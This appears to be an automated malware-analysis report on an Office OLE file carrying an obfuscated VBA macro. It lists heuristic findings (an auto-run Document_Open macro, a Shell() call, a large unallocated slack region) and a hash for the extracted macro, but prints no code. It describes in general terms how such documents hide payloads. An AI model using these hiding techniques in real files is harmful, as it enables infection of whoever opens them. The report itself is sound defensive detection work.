Verdict: MALICIOUS (Risk Score 162)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing a VBA macro. The macro is designed to execute arbitrary code using the Shell() function, which is a critical finding. The presence of a Document_Open macro suggests it executes automatically upon opening. No specific malware family could be identified, and the macro code is heavily obfuscated, limiting further analysis of its exact payload.
Heuristics (5)

- VBA macros detected (medium; 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro.
- OLE document has large unaccounted-for region (high) [OLE_SLACK_ANOMALY]: OLE file is 193,792 bytes but its declared streams total only 52,559 bytes; 141,233 bytes (73%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40911 bytes |

SHA-256 (macros.bas): 724de9c4a46eee3cdfc9a378fc315ce7b77c571bc5cfab5adf81d26454da0b2d
Preview script: first 1,000 lines of the extracted script (heavily obfuscated VBA).